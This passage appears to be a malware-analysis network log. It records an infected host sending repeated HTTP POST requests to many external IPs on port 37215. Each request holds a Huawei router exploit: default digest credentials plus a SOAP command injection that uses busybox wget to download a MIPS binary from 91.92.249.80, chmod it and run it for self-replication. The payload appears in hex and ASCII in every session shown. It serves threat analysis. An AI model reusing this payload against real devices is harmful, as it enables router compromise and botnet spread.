                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          48192.168.2.235015041.237.254.18437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102997065 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          49192.168.2.2340428157.29.141.23537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102997065 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          50192.168.2.235254841.213.47.7437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.103003025 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          51192.168.2.2338602157.248.136.19537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.103003025 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          52192.168.2.2349900157.147.162.14137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.103003025 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          53192.168.2.233802096.59.61.6437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.103007078 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          54192.168.2.2341690157.61.194.10137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.103024960 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          55192.168.2.2333684157.156.60.24337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.103034973 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          56192.168.2.2334178197.97.187.17237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.103035927 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          57192.168.2.233545841.173.85.11537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.103039980 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
